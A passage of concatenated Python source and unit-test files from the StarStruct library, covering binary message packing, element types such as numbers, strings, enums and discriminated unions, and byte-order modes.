            b'\x03\x04\x30\x31\x32\x33\x34\x35\x36' +
            b'\x37\x38\x39\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a',
            b'\xFF\x00\x00\x00\xFF\x7F\x00\x0A\x09' +
            b'\x7A\x79\x78\x00\x00\x00\x00\x00\x00' +
            b'\xFF\xFF\xFF\x7F\x03\x01\x00\xFF\x7F',
            b'\x64\x00\x00\x00\x64\x00\x00\x61\x30' +
            b'\x62\x31\x63\x32\x64\x33\x65\x34\x00' +
            b'\x10\x27\x00\x00\x01\x0A\x00\xFF\x7F' +
            b'\xFE\x80\xFD\x81\xFC\x82\xFB\x83\xFA' +
            b'\x84\xF9\x85\xF8\x86\xF7\x87\xF6\x88' +
            b'\x64\x00\x00\x00\xD0\x07\x00\x00',
        ],
        'big': [
            b'\x80\x00\x00\x00\x00\x00\x00\x30\x31' +
            b'\x32\x33\x34\x35\x36\x37\x38\x39\x00' +
            b'\x00\x00\x00\x00\x01\x00\x00\x32\x00' +
            b'\x00\x00\x55\x77\xAA\xCC',
            b'\x7F\x00\x00\x00\xFF\xFF\x00\x61\x62' +
            b'\x63\x64\x65\x66\x67\x68\x69\x6A\x00' +
            b'\xFF\xFF\xFF\xFF\x02\x00\x02\x01\x02' +
            b'\x03\x04\x30\x31\x32\x33\x34\x35\x36' +
            b'\x37\x38\x39\x61\x62\x63\x64\x65\x66' +
            b'\x67\x68\x69\x6a',
            b'\xFF\x00\x00\x00\x7F\xFF\x00\x0A\x09' +
            b'\x7A\x79\x78\x00\x00\x00\x00\x00\x00' +
            b'\x7F\xFF\xFF\xFF\x03\x00\x01\xFF\x7F',
            b'\x64\x00\x00\x00\x00\x64\x00\x61\x30' +
            b'\x62\x31\x63\x32\x64\x33\x65\x34\x00' +
            b'\x00\x00\x27\x10\x01\x00\x0A\xFF\x7F' +
            b'\xFE\x80\xFD\x81\xFC\x82\xFB\x83\xFA' +
            b'\x84\xF9\x85\xF8\x86\xF7\x87\xF6\x88' +
            b'\x64\x00\x00\x00\x00\x00\x07\xD0',
        ],
    }

    def test_init_invalid_name(self):
        """Test invalid Message names."""
        for name in [None, '', 1, dict(), list()]:
            with self.subTest(name):  # pylint: disable=no-member
                with self.assertRaises(TypeError) as cm:
                    Message(name, self.teststruct)
                self.assertEqual(str(cm.exception), 'invalid name: {}'.format(name))

    def test_init_invalid_mode(self):
        """Test invalid Message modes."""
        for mode in ['=', 'stuff', 0, -1, 1]:
            with self.subTest(mode):  # pylint: disable=no-member
                with self.assertRaises(TypeError) as cm:
                    Message('test', self.teststruct, mode)
                self.assertEqual(str(cm.exception), 'invalid mode: {}'.format(mode))

    def test_init_empty_struct(self):
        """Test an empty Message."""
        val = Message('test', [])
        self.assertEqual(val._tuple._fields, ())  # pylint: disable=protected-access

    def test_pack_little_endian(self):
        """Test pack the test formats."""
        test_msg = Message('test', self.teststruct, Mode.Little)
        for idx in range(len(self.testvalues)):
            with self.subTest(idx):  # pylint: disable=no-member
                packed_msg = test_msg.pack(**self.testvalues[idx])
                self.assertEqual(self.testbytes['little'][idx], packed_msg)

    def test_unpack_little_endian(self):
        """Test unpack the test formats."""
        test_msg = Message('test', self.teststruct, Mode.Little)
        assert test_msg.mode.to_byteorder() == 'little'
        for idx in range(len(self.testvalues)):
            with self.subTest(idx):  # pylint: disable=no-member
                # unpack_partial must return exactly the trailing extra bytes.
                (unpacked_partial_msg, unused) = test_msg.unpack_partial(self.testbytes['little'][idx] + b'\xde\xad')
                self.assertEqual(unused, b'\xde\xad')
                unpacked_msg = test_msg.unpack(self.testbytes['little'][idx])
                expected_tuple = test_msg.make(**self.testvalues[idx])  # pylint: disable=protected-access
                self.assertEqual(unpacked_msg, unpacked_partial_msg)
                self.assertEqual(unpacked_msg, expected_tuple)

    def test_pack_big_endian(self):
        """Test pack the test formats."""
        test_msg = Message('test', self.teststruct, Mode.Big)
        for idx in range(len(self.testvalues)):
            with self.subTest(idx):  # pylint: disable=no-member
                packed_msg = test_msg.pack(**self.testvalues[idx])
                self.assertEqual(self.testbytes['big'][idx], packed_msg)

    def test_unpack_big_endian(self):
        """Test unpack the test formats."""
        test_msg = Message('test', self.teststruct, Mode.Big)
        assert test_msg.mode.to_byteorder() == 'big'
        for idx in range(len(self.testvalues)):
            with self.subTest(idx):  # pylint: disable=no-member
                # unpack_partial must return exactly the trailing extra bytes.
                (unpacked_partial_msg, unused) = test_msg.unpack_partial(self.testbytes['big'][idx] + b'\xde\xad')
                self.assertEqual(unused, b'\xde\xad')
                unpacked_msg = test_msg.unpack(self.testbytes['big'][idx])
                expected_tuple = test_msg.make(**self.testvalues[idx])  # pylint: disable=protected-access
                self.assertEqual(unpacked_msg, unpacked_partial_msg)
                self.assertEqual(unpacked_msg, expected_tuple)

    def test_bad_names(self):
        # Field names that collide with Message internals must be rejected
        # and all offenders reported in the error message.
        with pytest.raises(ValueError) as e:
            test_msg = Message('test', [
                ('pack', 'H'),
                ('_elements', 'H'),
                ('_fields', 'H'),
            ])
            print(test_msg)

        assert 'pack' in str(e)
        assert '_elements' in str(e)
        assert '_fields' in str(e)
|
sprout42/StarStruct | starstruct/tests/test_elementenum.py | #!/usr/bin/env python3
"""Tests for the elementenum class"""
import unittest
import enum
from starstruct.elementenum import ElementEnum
# Int-valued enum used by the ElementEnum pack/unpack tests below.
class SimpleEnum(enum.Enum):
    """Simple enum class for testing message pack/unpack"""
    zero = 0
    one = 1
    two = 2
# pylint: disable=blacklisted-name
class StrEnum(enum.Enum):
"""string based enum class for testing message pack/unpack"""
foo = 'foo'
bar = 'bar'
# pylint: disable=line-too-long,invalid-name,no-self-use
class TestElementEnum(unittest.TestCase):
"""ElementEnum module tests"""
def test_valid(self):
"""Test field formats that are valid ElementEnum elements."""
test_fields = [
('a', 'b', SimpleEnum), # signed byte: -128, 127
('b', 'H', SimpleEnum), # unsigned short: 0, 65535
('d', 'L', SimpleEnum), # unsigned long: 0, 2^32-1
('e', '?', SimpleEnum), # bool: 0, 1
('d', '10s', StrEnum), # 10 byte string
]
for field in test_fields:
with self.subTest(field): # pylint: disable=no-member
out = ElementEnum.valid(field)
self.assertTrue(out)
def test_not_valid(self):
"""Test field formats that are not valid ElementEnum elements."""
test_fields = [
('a', '4x', SimpleEnum), # 4 pad bytes
('b', 'z', SimpleEnum), # invalid
('c', '1', SimpleEnum), # invalid
('e', '9S', SimpleEnum), # invalid (must be lowercase)
('d', '/', SimpleEnum), # invalid
('f', 'H'), # unsigned short (no class)
]
for field in test_fields:
with self.subTest(field): # pylint: disable=no-member
out = ElementEnum.valid(field)
self.assertFalse(out)
def test_valid_pack(self):
"""Test packing valid enum values."""
field = ('a', 'b', SimpleEnum) # signed byte: -128, 127
out = ElementEnum.valid(field)
self.assertTrue(out)
elem = ElementEnum(field)
test_values = [
({'a': 0}, b'\x00'),
({'a': 2}, b'\x02'),
({'a': SimpleEnum.one}, b'\x01'),
({'a': SimpleEnum.two}, b'\x02'),
({'a': 'two'}, b'\x02'),
]
for (in_val, out_val) in test_values:
with self.subTest((out_val, in_val)): # pylint: disable=no-member
ret = elem.pack(in_val)
self.assertEqual(ret, out_val)
def test_invalid_pack(self):
"""Test packing invalid enum values."""
field = ('a', 'b', SimpleEnum) # signed byte: -128, 127
out = ElementEnum.valid(field)
self.assertTrue(out)
elem = ElementEnum(field)
test_values = [
{'a': -1},
{'a': 3},
{'a': 'three'},
{'a': 'ONE'},
]
msg = '{} is not a valid {}'
for val in test_values:
with self.subTest(val): # pylint: disable=no-member
with self.assertRaises(ValueError) as cm:
elem.pack(val)
self.assertEqual(str(cm.exception), msg.format(val['a'], 'SimpleEnum'))
def test_valid_unpack(self):
"""Test unpacking valid enum values."""
field = ('a', 'b', SimpleEnum) # signed byte: -128, 127
out = ElementEnum.valid(field)
self.assertTrue(out)
elem = ElementEnum(field)
test_values = [
(SimpleEnum.zero, b'\x00'),
(SimpleEnum.one, b'\x01'),
(SimpleEnum.two, b'\x02'),
]
for (out_val, in_val) in test_values:
with self.subTest((out_val, in_val)): # pylint: disable=no-member
(ret, unused) = elem.unpack({}, in_val)
self.assertEqual(unused, b'')
self.assertEqual(ret, out_val)
def test_invalid_unpack(self):
"""Test unpacking invalid enum values."""
field = ('a', 'b', SimpleEnum) # signed byte: -128, 127
out = ElementEnum.valid(field)
self.assertTrue(out)
elem = ElementEnum(field)
test_values = [
(b'\xFF', -1),
(b'\x03', 3),
(b'\x7F', 127),
(b'\x10', 16),
(b'\x80', -128),
]
# msg = '{} is not a valid {}'
for (in_val, out_val) in test_values:
with self.subTest((in_val, out_val)): # pylint: disable=no-member
# with self.assertRaises(ValueError) as cm:
with self.assertRaises(ValueError):
elem.unpack({}, in_val)
# self.assertEqual(str(cm.exception), msg.format(out_val, 'SimpleEnum'))
|
sprout42/StarStruct | starstruct/tests/test_elementnum.py | <gh_stars>1-10
#!/usr/bin/env python3
"""Tests for the elementbase class"""
import unittest
from starstruct.elementnum import ElementNum
# pylint: disable=line-too-long,invalid-name
class TestElementNum(unittest.TestCase):
    """ElementNum module tests"""

    def test_valid(self):
        """Test field formats that are valid ElementNum elements."""
        test_fields = [
            ('a', '3b'),  # 3 byte number: 0, 2^24-1
            ('b', 'H'),   # unsigned short: 0, 65535
            ('c', '4Q'),  # 32 signed byte number: (super big number)
            ('d', 'l'),   # signed long: -2^31, 2^31-1
        ]

        for field in test_fields:
            with self.subTest(field):  # pylint: disable=no-member
                out = ElementNum.valid(field)
                self.assertTrue(out)

    def test_not_valid(self):
        """Test field formats that are not valid ElementNum elements."""
        test_fields = [
            ('a', '4x'),  # 4 pad bytes
            ('b', 'z'),   # invalid
            ('c', '1'),   # invalid
            ('d', '9S'),  # invalid (must be lowercase)
            ('e', '/'),   # invalid
            ('f', '?'),   # invalid (bool is not a numeric element)
        ]

        for field in test_fields:
            with self.subTest(field):  # pylint: disable=no-member
                out = ElementNum.valid(field)
                self.assertFalse(out)
|
sprout42/StarStruct | starstruct/elementnum.py | <filename>starstruct/elementnum.py
"""StarStruct element class."""
import struct
import re
import enum
from starstruct.element import register, Element
from starstruct.modes import Mode
@register
class ElementNum(Element):
"""
A StarStruct element class for number fields.
"""
# pylint: disable=too-many-instance-attributes
    def __init__(self, field, mode=Mode.Native, alignment=1):
        """Initialize a StarStruct element object.

        :param field: (name, struct format) tuple for this element
        :param mode: byte-order Mode whose prefix is prepended to the format
        :param alignment: byte alignment used when padding packed data
        """
        # All of the type checks have already been performed by the class
        # factory
        self.name = field[0]

        # The ref attribute is required for all elements, but the base element
        # type does not have one
        self.ref = None

        self._mode = mode
        self._alignment = alignment

        # Validate that the format specifiers are valid struct formats, this
        # doesn't have to be done now because the format will be checked when
        # any struct functions are called, but it's better to inform the user of
        # any errors earlier.

        # The easiest way to perform this check is to create a "Struct" class
        # instance, this will also increase the efficiency of all struct related
        # functions called.
        self.format = mode.value + field[1]
        self._struct = struct.Struct(self.format)

        # for numeric elements we should also keep track of how many numeric
        # fields and what the size of those fields are required to create this
        # element.
        # Size in bytes of ONE value (the last format character alone).
        self._bytes = struct.calcsize(self.format[-1])
        # Signed iff a lowercase integer conversion code is used.
        self._signed = self.format[-1] in 'bhilq'
@staticmethod
def valid(field):
"""
Validation function to determine if a field tuple represents a valid
base element type.
The basics have already been validated by the Element factory class,
validate the specific struct format now.
"""
return len(field) == 2 \
and isinstance(field[1], str) \
and re.match(r'\d*[bBhHiIlLqQ]', field[1])
def validate(self, msg):
"""
Ensure that the supplied message contains the required information for
this element object to operate.
The "number" element requires no further validation.
"""
pass
def update(self, mode=None, alignment=None):
"""change the mode of the struct format"""
if alignment:
self._alignment = alignment
if mode:
self._mode = mode
self.format = mode.value + self.format[1:]
# recreate the struct with the new format
self._struct = struct.Struct(self.format)
def pack(self, msg):
"""Pack the provided values into the supplied buffer."""
# Take a single numeric value and convert it into the necessary list
# of values required by the specified format.
val = msg[self.name]
# This should be a number, but handle cases where it's an enum
if isinstance(val, enum.Enum):
val = val.value
# If the value supplied is not already a bytes object, convert it now.
if isinstance(val, (bytes, bytearray)):
val_list = val
else:
val_list = val.to_bytes(struct.calcsize(self.format),
byteorder=self._mode.to_byteorder(),
signed=self._signed)
# join the byte list into the expected number of values to pack the
# specified struct format.
val = [int.from_bytes(val_list[i:i + self._bytes], # pylint: disable=no-member
byteorder=self._mode.to_byteorder(),
signed=self._signed)
for i in range(0, len(val_list), self._bytes)]
data = self._struct.pack(*val)
# If the data does not meet the alignment, add some padding
missing_bytes = len(data) % self._alignment
if missing_bytes:
data += b'\x00' * missing_bytes
return data
def unpack(self, msg, buf):
"""Unpack data from the supplied buffer using the initialized format."""
ret = self._struct.unpack_from(buf, 0)
# Remember to remove any alignment-based padding
extra_bytes = self._alignment - 1 - (struct.calcsize(self.format) %
self._alignment)
unused = buf[struct.calcsize(self.format) + extra_bytes:]
# merge the unpacked data into a byte array
data = [v.to_bytes(self._bytes, byteorder=self._mode.to_byteorder(),
signed=self._signed) for v in ret]
# Join the returned list of numbers into a single value
val = int.from_bytes(b''.join(data), # pylint: disable=no-member
byteorder=self._mode.to_byteorder(),
signed=self._signed)
return (val, unused)
def make(self, msg):
"""Return the expected "made" value"""
val = msg[self.name]
# This should be a number, but handle cases where it's an enum
if isinstance(val, enum.Enum):
val = val.value
elif isinstance(val, list):
# It's unlikely but possible that this could be a list of numbers,
# or a list of bytes
if all(isinstance(v, bytes) for v in val):
# To turn this into a single number, merge the bytes, later the
# bytes will be converted into a single number.
data = b''.join(val)
elif all(isinstance(v, int) for v in val):
# To turn this into a single number, convert the numbers into
# bytes, and merge the bytes, later the bytes will be converted
# into a single number.
data = [v.to_bytes(self._bytes,
byteorder=self._mode.to_byteorder(),
signed=self._signed) for v in val]
else:
error = 'Invalid value for numerical element: {}'
raise TypeError(error.format(val))
elif isinstance(val, bytes):
# If the value supplied is a bytes object, convert it to a number
data = val
elif isinstance(val, int):
return val
else:
error = 'Invalid value for numerical element: {}'
raise TypeError(error.format(val))
return int.from_bytes(data, # pylint: disable=no-member
byteorder=self._mode.to_byteorder(),
signed=self._signed)
|
sprout42/StarStruct | starstruct/elementstring.py | <reponame>sprout42/StarStruct<gh_stars>1-10
"""StarStruct element class."""
import struct
import re
from starstruct.element import register, Element
from starstruct.modes import Mode
@register
class ElementString(Element):
    """
    A StarStruct element for strings, because standard string treatment of
    pack/unpack can be inconvenient.

    This element will encode and decode string type elements ('s', 'p' and
    'c' struct formats) from and to forms that are easier to use and manage.
    """

    def __init__(self, field, mode=Mode.Native, alignment=1):
        """Initialize a StarStruct element object.

        :param field: ``(name, struct format)`` tuple using 's', 'p' or 'c'
        :param mode: byte order used to pack/unpack (a :class:`Mode` value)
        :param alignment: pad packed output to a multiple of this many bytes
        """
        # All of the type checks have already been performed by the class
        # factory
        self.name = field[0]

        # The ref attribute is required for all elements, but base element
        # types don't have one
        self.ref = None

        self._mode = mode
        self._alignment = alignment

        # Validate that the format specifiers are valid struct formats.  This
        # doesn't have to be done now because the format will be checked when
        # any struct functions are called, but it's better to inform the user
        # of any errors earlier.  Creating a "Struct" instance performs that
        # check and also increases the efficiency of later struct calls.
        self.format = mode.value + field[1]
        self._struct = struct.Struct(self.format)

    @staticmethod
    def valid(field):
        """
        Validation function to determine if a field tuple represents a valid
        string element type.
        """
        return len(field) == 2 \
            and isinstance(field[1], str) \
            and re.match(r'\d*[csp]', field[1])

    def validate(self, msg):
        """
        Ensure that the supplied message contains the required information for
        this element object to operate.

        The "string" element requires no further validation.
        """
        pass

    def update(self, mode=None, alignment=None):
        """Change the byte-order mode and/or alignment of the struct format."""
        if alignment:
            self._alignment = alignment

        if mode:
            self._mode = mode
            self.format = mode.value + self.format[1:]
            # recreate the struct with the new format
            self._struct = struct.Struct(self.format)

    def pack(self, msg):
        """Pack the provided values into the supplied buffer."""
        # Ensure that the input is of the proper form to be packed
        val = msg[self.name]
        size = struct.calcsize(self.format)
        assert len(val) <= size

        if self.format[-1] in ('s', 'p'):
            # 's'/'p' formats pack a single bytes value; encode str input.
            if not isinstance(val, bytes):
                assert isinstance(val, str)
                val = val.encode()

            if self.format[-1] == 'p' and len(val) < size:
                # 'p' (pascal strings) must be the exact size of the format
                val += b'\x00' * (size - len(val))

            data = self._struct.pack(val)
        else:  # 'c'
            # 'c' formats pack one single-byte bytes object per character.
            if not all(isinstance(c, bytes) for c in val):
                if isinstance(val, bytes):
                    val = [bytes([c]) for c in val]
                else:
                    # last option, it could be a string, or a list of strings
                    assert (isinstance(val, list) and
                            all(isinstance(c, str) for c in val)) or \
                        isinstance(val, str)
                    val = [c.encode() for c in val]

            if len(val) < size:
                # Null-fill the character list out to the format size.
                val.extend([b'\x00'] * (size - len(val)))

            data = self._struct.pack(*val)

        # If the data does not meet the alignment, pad it out to the next
        # multiple of the alignment.
        missing_bytes = len(data) % self._alignment
        if missing_bytes:
            data += b'\x00' * (self._alignment - missing_bytes)
        return data

    def unpack(self, msg, buf):
        """Unpack data from the supplied buffer using the initialized format."""
        ret = self._struct.unpack_from(buf, 0)

        # Skip past the struct data plus any alignment-based padding added by
        # pack().
        # BUGFIX: the pad size was previously computed as
        # (alignment - 1 - size % alignment), which skips alignment-1 stray
        # bytes when the struct size is already aligned and is off by one
        # otherwise; use the standard (alignment - size % alignment) %
        # alignment expression instead.
        size = struct.calcsize(self.format)
        extra_bytes = (self._alignment - size % self._alignment) % self._alignment
        unused = buf[size + extra_bytes:]

        if self.format[-1] in 's':
            # for 's' formats, convert to a string and strip padding
            val = ret[0].decode().strip('\x00')
        elif self.format[-1] in 'p':
            # for 'p' formats, convert to a string, but leave the padding
            val = ret[0].decode()
        else:  # 'c'
            # Just in case we have some ints in the message
            val = [c.decode() if not isinstance(c, int)
                   else chr(c)
                   for c in ret]
        return (val, unused)

    def make(self, msg):
        """Return a string of the expected format"""
        val = msg[self.name]
        size = struct.calcsize(self.format)
        assert len(val) <= size

        # If the supplied value is a list of chars, or a list of bytes, turn
        # it into a string for ease of processing.
        if isinstance(val, list):
            if all(isinstance(c, bytes) for c in val):
                val = ''.join([c.decode() for c in val])
            elif all(isinstance(c, str) for c in val):
                val = ''.join([c for c in val])
            else:
                error = 'Invalid value for string element: {}'
                raise TypeError(error.format(val))
        elif isinstance(val, bytes):
            # If the supplied value is a bytes, decode it into a normal string
            val = val.decode()

        # 'p' (pascal strings) must fill the format exactly; the first packed
        # byte holds the length, so the content may be at most size - 1.
        if self.format[-1] == 'p' and len(val) < size - 1:
            val += '\x00' * (size - len(val) - 1)

        # Lastly, 'c' (char list) formats are expected to be a list of
        # characters rather than a string.
        if self.format[-1] == 'c':
            val += '\x00' * (size - len(val))
            val = [c for c in val]
        return val
|
sprout42/StarStruct | starstruct/elementdiscriminated.py | """StarStruct element class."""
import starstruct
from starstruct.element import register, Element
from starstruct.modes import Mode
@register
class ElementDiscriminated(Element):
    """
    The discriminated StarStruct element class.

    A discriminated element behaves like a C union: the format is a dict
    mapping values of a referenced enum field to StarStruct Message objects
    (or None for "no payload"), and the referenced field's value selects
    which message format is used to pack/unpack this element.
    """

    def __init__(self, field, mode=Mode.Native, alignment=1):
        """Initialize a StarStruct element object.

        :param field: ``(name, {enum value: Message or None}, ref field name)``
        :param mode: byte order propagated to every sub-message
        :param alignment: alignment propagated to every sub-message
        """
        # All of the type checks have already been performed by the class
        # factory
        self.name = field[0]
        self.ref = field[2]

        # Discriminated elements don't use the normal struct format, the
        # format is the supplied dictionary where the key is a value of the
        # referenced enum element, and the value for each entry is a
        # StarStruct.Message object.
        self.format = field[1]

        # but change the mode to match the current mode.
        self.update(mode, alignment)

    @staticmethod
    def valid(field):
        """
        Validation function to determine if a field tuple represents a valid
        discriminated element type.

        The basics have already been validated by the Element factory class;
        check that the format is a dict of Message (or None) values and that
        a reference field name is supplied.
        """
        return len(field) == 3 \
            and isinstance(field[1], dict) \
            and isinstance(field[2], str) \
            and all(isinstance(val, (starstruct.message.Message, type(None)))
                    for val in field[1].values())

    def validate(self, msg):
        """
        Ensure that the supplied message contains the required information for
        this element object to operate.

        All Discriminated elements must reference valid Enum elements, and the
        keys of the discriminated format must be valid instances of the
        referenced Enum class.
        """
        # Imported here to avoid a circular import at module load time.
        from starstruct.elementenum import ElementEnum
        if not isinstance(msg[self.ref], ElementEnum):
            err = 'discriminated field {} reference {} invalid type'
            raise TypeError(err.format(self.name, self.ref))
        elif not all(isinstance(key, msg[self.ref].ref)
                     for key in self.format.keys()):
            err = 'discriminated field {} reference {} mismatch'
            raise TypeError(err.format(self.name, self.ref))
        else:
            for key in self.format.keys():
                try:
                    # Constructing the enum raises ValueError for keys that
                    # are not valid members of the referenced enum class.
                    # BUGFIX: this used `assert ref_cls(key)` inside a bare
                    # `except:` -- the assert is stripped under `python -O`
                    # and the bare except swallowed every exception; call
                    # the enum directly and catch only ValueError.
                    ref_cls = msg[self.ref].ref
                    ref_cls(key)
                except ValueError:
                    err = 'discriminated field {} key {} not a valid {}'
                    # Use a local name rather than rebinding the `msg`
                    # parameter (which the original code shadowed).
                    err_msg = err.format(self.name, key, self.ref)
                    raise TypeError(err_msg)

    def update(self, mode=None, alignment=None):
        """Change the mode/alignment of each sub-message format."""
        # BUGFIX: mode/alignment were assigned unconditionally, so calling
        # update() with only one argument wiped the other out with None;
        # guard the assignments like the other element classes do.
        if mode:
            self._mode = mode
        if alignment:
            self._alignment = alignment

        for key in self.format.keys():
            if self.format[key] is not None:
                self.format[key].update(mode, alignment)

    def pack(self, msg):
        """Pack the provided values into the supplied buffer."""
        # When packing use the value of the referenced element to determine
        # which field format to use to pack this element. Be sure to check if
        # the referenced format is None or a Message object.
        if msg[self.ref] not in self.format:
            err_msg = 'invalid value {} for element {}:{}'.format(
                msg[self.ref], self.name, self.format.keys())
            raise ValueError(err_msg)

        if self.format[msg[self.ref]] is not None:
            if msg[self.name] is not None:
                data = self.format[msg[self.ref]].pack(dict(msg[self.name]))
            else:
                data = self.format[msg[self.ref]].pack({})
        else:
            data = b''

        # There is no need to make sure that the packed data is properly
        # aligned, because that should already be done by the individual
        # messages that have been packed.
        return data

    def unpack(self, msg, buf):
        """Unpack data from the supplied buffer using the selected format."""
        # When unpacking a discriminated element, reference the already
        # unpacked enum field to determine how many elements need unpacked.
        # If the specific value is None rather than a Message object, return
        # no new parsed data.
        #
        # There is no need to make sure that the unpacked data consumes a
        # properly aligned number of bytes because that should already be
        # done by the message that is unpacked.
        #
        # Use the getattr() function since the referenced value is an enum
        if self.format[getattr(msg, self.ref)] is not None:
            return self.format[getattr(msg, self.ref)].unpack_partial(buf)
        else:
            return (None, buf)

    def make(self, msg):
        """Return the expected "made" value for the selected sub-message."""
        if hasattr(msg, self.ref):
            key = getattr(msg, self.ref)
        else:
            # Assume it's a dictionary, not a tuple
            key = msg[self.ref]

        if self.format[key] is not None:
            return self.format[key].make(msg[self.name])
        else:
            return None
|
sprout42/StarStruct | starstruct/modes.py | <gh_stars>1-10
"""binary representation modes used for a StarStruct object."""
import sys
import enum
@enum.unique
class Mode(enum.Enum):
    """The StarStruct modes match the modes supported by struct.pack/unpack."""
    Native = '='
    Little = '<'
    Big = '>'
    Network = '!'

    def to_byteorder(self):
        """
        Convert a Mode to a byteorder string such as required by the
        to_bytes() or from_bytes() functions.
        """
        if self is Mode.Native:
            # Native mode follows whatever the host platform uses.
            return sys.byteorder
        # Big and Network are both big-endian.
        return 'little' if self is Mode.Little else 'big'

    @staticmethod
    def from_byteorder(val):
        """
        Convert a byteorder string such as used by the to_bytes() or
        from_bytes() functions into a Mode value.

        'native' and 'network' are custom extensions beyond the strings the
        int byteorder functions produce.
        """
        for name, mode in (('little', Mode.Little),
                           ('big', Mode.Big),
                           ('native', Mode.Native),      # custom
                           ('network', Mode.Network)):   # custom
            if val == name:
                return mode
        raise TypeError('{} not a valid byteorder'.format(val))
|
sprout42/StarStruct | starstruct/tests/test_elementconstant.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the constant class"""
import unittest
from starstruct.message import Message
from starstruct.modes import Mode
class TestElementConstant(unittest.TestCase):
    """Tests for constant (fixed-value) message elements.

    A constant element is declared as a 3-tuple whose third item is the
    fixed tuple of values; callers never supply it in the input data.
    """

    def test_one_element(self):
        """make() fills in a trailing constant element automatically."""
        TestStruct = Message('TestStruct', [
            ('regular', 'B'),  # Two regular messages
            ('fill_in_later', 'H'),
            ('ending_sequence', 'II', (0xAA, 0xBB)),  # An ending sequence to a message
        ])

        # Note: the constant field is deliberately absent from the input.
        test_data = {
            'regular': 13,
            'fill_in_later': 4,
        }

        made = TestStruct.make(**test_data)

        assert made.regular == 13
        assert made.fill_in_later == 4
        assert made.ending_sequence == (0xAA, 0xBB)

    def test_unpack(self):
        """pack() emits the constant bytes and unpack() recovers them."""
        TestStruct = Message('TestStruct', [
            ('regular', 'B'),  # Two regular messages
            ('fill_in_later', 'H'),
            ('ending_sequence', 'II', (0xAB, 0xBA)),  # An ending sequence to a message
        ], Mode.Little)

        test_data = {
            'regular': 8,
            'fill_in_later': 7,
        }

        # Little-endian: B, H, then the two constant I values.
        test_bytes = b'\x08\x07\x00\xab\x00\x00\x00\xba\x00\x00\x00'
        assert test_bytes == TestStruct.pack(**test_data)

        unpacked = TestStruct.unpack(test_bytes)
        assert unpacked.regular == 8
        assert unpacked.fill_in_later == 7
        assert unpacked.ending_sequence == (0xAB, 0xBA)

    def test_unpack_in_the_middle(self):
        """A constant element placed before variable-length data round-trips."""
        SomeMessage = Message('SomeMessage', [
            ('regular', 'B'),
            ('irregular', 'B'),
            ('confused', 'B'),
        ])

        TestStruct = Message('TestStruct', [
            ('regular', 'B'),
            ('middle_constant', 'II', (0xAB, 0xBA)),
            ('a_variable_length', 'H', 'msg'),
            ('msg', SomeMessage, 'a_variable_length')
        ], Mode.Little)

        test_data = {
            'regular': 8,
            'a_variable_length': 2,
            'msg': [
                {'regular': 4, 'irregular': 0, 'confused': 6},
                {'regular': 5, 'irregular': 2, 'confused': 4},
            ],
        }

        made = TestStruct.make(**test_data)
        assert made.regular == 8
        assert made.middle_constant == (0xAB, 0xBA)

        packed = TestStruct.pack(test_data)
        # B, constant II, length H, then two packed SomeMessage records.
        assert packed == b'\x08\xab\x00\x00\x00\xba\x00\x00\x00\x02\x00\x04\x00\x06\x05\x02\x04'

        unpacked = TestStruct.unpack(packed)
        assert unpacked.regular == 8
        assert unpacked.middle_constant == (0xAB, 0xBA)
|
sprout42/StarStruct | starstruct/elementnone.py | <filename>starstruct/elementnone.py<gh_stars>1-10
"""
Element None
A non-packable, non-unpackable item that can help facilitate with additional information about an object,
pass extra references to a variable and potentially more
.. code-block:: python
ExampleMessage = Message('VarTest', [('x', 'B'), ('y', 'B')])
CRCedMessage = Message('CRCedMessage', [
('data', ExampleMessage), # A data field that has the example message in it
('extra_param', None), # The None Element
('crc', 'I', my_crc32, ['data', 'extra_param']), # Crc the data, and give an error if we have something unexpected
])
"""
from typing import Optional
from starstruct.element import register, Element
from starstruct.modes import Mode
@register
class ElementNone(Element):
    """
    A placeholder element that packs and unpacks nothing.

    It carries a named value through make() so that other elements (for
    example callable elements) can reference extra, non-packed information.
    """

    def __init__(self, field: list, mode: Optional[Mode]=Mode.Native, alignment: Optional[int]=1):
        """Remember the field name; mode and alignment are stored but unused.

        :param field: The fields passed into the constructor of the element
        :param mode: The mode in which to pack the bytes
        :param alignment: Number of bytes to align to
        """
        self.name = field[0]
        self.update(mode=mode, alignment=alignment)

    @staticmethod
    def valid(field: tuple) -> bool:
        """A valid None element is a ('name', None) pair."""
        if len(field) != 2:
            return False
        name, fmt = field
        return isinstance(name, str) and fmt is None

    def validate(self, msg):
        """Nothing to validate for a None element."""
        return True

    def update(self, mode=None, alignment=None):
        """Store a new mode/alignment; neither affects this element."""
        if mode:
            self._mode = mode
        if alignment:
            self._alignment = alignment

    def pack(self, msg):
        """A None element contributes no bytes to the packed output."""
        return b''

    def unpack(self, msg, buf):
        """A None element consumes no bytes and always unpacks to None."""
        return (None, buf)

    def make(self, msg):
        """Pass the supplied value through unchanged."""
        return msg[self.name]
|
sprout42/StarStruct | starstruct/element.py | <filename>starstruct/element.py
"""StarStruct element class."""
from typing import Optional, Tuple
from starstruct.modes import Mode
def register(cls):
    """Class decorator that registers ``cls`` as an element type.

    Registered classes are the candidates consulted by Element.factory():
    each candidate's valid() staticmethod decides whether it matches a
    given field tuple.  Returns ``cls`` unchanged.
    """
    Element.register(cls)
    return cls
class Element(object):
    """
    A class factory that determines the type of the field passed in, and
    instantiates the correct class type.
    """
    # Registry of element subclasses, consulted in registration order by
    # factory().
    elementtypes = []

    @classmethod
    def register(cls, element):
        """Function used to register new element subclasses."""
        cls.elementtypes.append(element)

    @classmethod
    def factory(cls, field: tuple, mode: Optional[Mode]=Mode.Native, alignment: Optional[int]=1):
        """
        Initialize a StarStruct element object based on the type of element
        parameters provided.

        Where the values in the tuple determine the type of element.

        These are the possible element types:
         1. Normal (base): a standard python struct format character, and a
            field name are provided.  The optional element should not provided.
         2. Enum: a standard python struct format character and field name are
            provided, but the 3rd optional element is provided which is a
            subclass of enum.Enum.
         3. Length: a standard python struct format character that represents
            an unsigned numeric value, and the field name are provided, but the
            3rd optional element is provided and is a string.  In this case the
            string is assumed to be another field which is the name of a
            Variable element.
         4. Variable: a variable length element that accommodates 0 or more of
            another StarStruct.message.  The format field should be a valid
            StarStruct.message, the optional 3rd element must be provided and
            should be the name of a valid Length element or an int.  The
            validity of the referenced element must be checked after the
            creation of the entire message with the Message.validate() function.
         5. Discriminated: a message element that can have multiple formats
            such as a C union.  The format field should be a dictionary where
            the keys represent values of a referenced enumeration field, and
            the value for each entry is a valid StarStruct.message, or None.
            The optional 3rd element must be provided and should be the name of
